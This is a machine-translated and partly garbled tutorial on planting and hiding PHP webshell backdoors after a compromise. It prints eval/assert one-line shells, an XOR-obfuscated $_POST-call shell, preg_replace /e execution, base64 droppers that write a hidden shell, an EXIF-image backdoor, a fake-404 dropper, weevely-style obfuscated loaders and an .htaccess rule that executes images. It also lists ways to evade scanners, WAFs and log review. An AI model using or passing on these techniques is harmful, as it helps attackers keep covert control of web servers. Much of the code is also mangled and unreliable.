PHP backdoor hiding and maintenance techniques

After a successful test, you usually want to keep the privileges longer. The work of leaving backdoors is crucial. The backdoors usually deployed include but are not limited to database permissions, WEB permissions, system user permissions, etc. This article will popularize some of the ideas hidden in Volkswagen’s backdoors.

AD:

0×00 Preface

After a successful test, you usually want to keep the privileges longer. The work of leaving backdoors is very important. The backdoors usually deployed include but are not limited to databases. Permissions, WEB permissions, system user permissions, etc. This article will popularize some of the ideas hidden by popular backdoors.

Take PHP-WEBBACKDOOR as an example to attract others

A most common one-sentence backdoor may be written like this

1. eval($_POST['cmd']);?>

or this

1. $_POST['cmd' ]);?>

Of course, this is only different in the functions called. Regarding the functions disabled by PHP, please look for them in php.ini: disable_functions.

But there are many ways for operation and maintenance to intuitively find our shell. For example,

◆ found anomalies through file name/modification time/size, file backup comparison

◆ found through WEBSHELL backdoor scanning script, such as Scanbackdoor.php/Pecker/shelldetect.php and various scanners, etc.

◆Through Access.log access log found the location of the backdoor

◆Or, our test sentence will be blocked by WAF, and there will be a warning log, etc.

In view of common detection methods, the following seven common techniques are summarized to hide the shell

0×01 circumvention

Look at the various scanning backdoor codes and you will know that leaving a keyword that everyone knows and everyone shouts is absolutely not allowed in the shell

Common keywords such as :

◆System command execution: system, passthru, shell_exec, exec, popen, proc_open

◆Code execution: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆File contains: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

In the past, a friend cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately, it is difficult to escape the scanner now, but everything has changed, and the construction method It is infinite

tudouya classmate gave [a construction technique] on FREEBUF (http://www.freebuf.com/articles/web/33824.html) using

2. @$ _++; // $_ = 1
3. $__=("#"^"|"); // $__ = _
4. $__.=( "."^"~"); // _P
5. $__.=("/"^"`"); // _PO
6. $ __.=("|"^"/"); // _POS
7. $__.=("{"^"/"); // _POST
8. ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
9. ?>

Construction generation, of course, if it is too intuitive, you can write it like this

1. $_++;$__=("#"^"|").( "."^"~").("/"^"`").("|"^"/").("{"^"/");@${ $__}[!$_](${$__}[$_]);?> The code is disguised, and a simple "anti-kill" shell sample appearsIt executes correctly and bypasses ordinary scanners, and you can also rely on it to write a new temporary shell0×02 feature It is also an interesting way to execute commands with the help of syntax features. Borrowing the syntax features of PHP when processing variables, it will analyze whether the data in double quotes contains variables (and parse their values)eg.:
${@

eval(phpinfo())}

{} can parse the variable content within double quotes, @keep the error and continue execution

Then you can start to construct the hidden backdoor, but here the structure wants to rely on The command execution caused by the function is, yes, preg_replace

"//e",

$_POST[

'cmd'],

"");?>

1. This method has obviously been entered into the scanner blacklist, please modify it simply
2. function funfunc($str){}
3. echo preg_replace("//ies", 'funfunc ("1")', $_POST["cmd"]);
4. ?>

was executed and was not found. The way of execution is obvious. After regular matching The {${phpinfo()}} caused code execution when passed into funfunc

funfunc(

"{${phpinfo()}}")
1. Another method
"$arr="".

$_GET[

'cmd'].
"";");?>
0×03 contains

file contains everyone I have tried all the methods, but there are also techniques for including. Ordinary file inclusion may just be an include that contains a certain txt or jpg, or even directly leave an include vulnerability, but it is easy for a scanner to find it, and extra include files are also easy to find.

Look at this script
if(@isset(

$_GET[content]))

1. {
2. $fp=fopen('REA DME',
'w ');
4. file_put_contents('README',"
5. @file_put_contents('README',$_GET [content],FILE_APPEND); (Fclose (l $ fp);
Require
6. 'README ';} ? & Gt;
can be regarded as solved a little problem.
8. Unfortunately, because functions such as file_put_contents are too sensitive, they are easily discovered by scanning Encoding is used to create a shell, which is generated with access.
fputs(fopen(
base64_decode (

'cGx1Z2luX20ucGhw'),w),

base64_decode(

'PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));

1. ?> Can evade some scanners, but this mode is also more attractive To attract people's attention, the new files generated should also be simply hidden to avoid detection. Of course, new concepts such as heuristics will not be considered. In the case that this method cannot meet the needs, a smart The attacker regained the image $exif=exif_read_data('./lol.jpg');preg_replace(
$exif[
2. 'Make'],
$exif[
'Model'] ,

'');?>

1. Reference: A backdoor hidden in the EXIF ​​of JPG imagesThis time, you don’t have to simply copy /b to generate the image horse, use preg_replace to execute Specific flags of the file are also possibleHere may prompt Call to undefined function exif_read_data()You need to modify php.ini, extension=php_exif.dllChange its loading order to extension=php_mbstring.dll From the back

it can be seen that this image backdoor relies on the preg_replace e parameter, relies on PHP's variable parsing and execution, and uses base64 encoding. Finally, it relies on file identification to put together a complete shell, which can be regarded as hiding the backdoor for beginners. A little reminder for children's shoes

Of course, as long as there is an include point, the form of the included file is diverse, even including error_log (although you may want to consider closing it), only unexpected...

0×04 is hidden
In order to prevent visitors After discovering the existence of backdoors, clever security researchers will also confuse things and try to confuse things
1. span>"-//IETF//DTD HTML 2.0//EN">
2.                                                                             >
3.   body>
4.                                                                                           
6. ?>
7. With the help of the above html rendering, the browsing page has begun to disguise 404 to confuse the audience
8. But it can’t be avoided by visitors or log analysis. In order to better hide in a large number of logs, the structure The following script
11. header('HTTP/1.1 404'); ob_start(); @fputs(fopen(
base64_decode(
12. 'cGx1Z2luX20ucGhw'),w),
base64_decode(
'PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));
The access is a real 404, yes, the same is true in the log
4. But at this moment, the script we want to connect has been generated in the current directory 0×05 confusion Children’s shoes who have used the weevely tool should know that the anti-kill shell it generates is like this $penh=
"sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";
$kthe=

"JGEpPjgiMpe yRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";



                                                              stwrw_wrwepwlwawcwe");
                                                                    
1. $zrmt=
"JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";
2. $smgv =
$ftdf(
3. "f", "", " bfafsfef6f4_fdfefcodfe”);
4. $rdwm = $jgfi( '', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.
$penh)));
5. $rdwm();
7. ?> After connecting to the terminal, it looks like thisPs: I forgot to change the terminal code in the screenshot: (
8. The way to avoid killing is to generate a random name in a fixed area variables, and then use str_replace to combine base64_decode, the process of executing the commandOf course, this is to obfuscate at the code level to avoid scannersThe more commonly used method of obfuscation:◆Modify the file time◆Rename and integrate into upload The folder where the file is located makes it impossible to visually detect file abnormalities◆Disguise processing of file size (at least the size looks like a normal script)
9. ◆Choose the hiding path and access as little as possible◆Abnormal directory %20 About the space directory, it is relatively easy to find0×06 parsingUse .htaccess to add parsing backdoorsuch as:AddType application/x-httpd-php .jpg
The above is taking weeverly as an example
10. 0×07 Mixture

To summarize the above methods, most of them are nothing more than a process of constructing vulnerabilities. The code constructed by the vulnerability can be as weird as the backdoor can be. You can write something delicate and graceful, or you can make it simple and crude, but the applicable situations are different. For example It is not difficult to integrate ideas well and construct your own hidden shell. The above is just a summary of experience. If you have interesting ideas, please feel free to enlighten me.

The above introduces the PHP backdoor hiding and maintenance techniques, including the relevant content. I hope it will be helpful to friends who are interested in PHP tutorials.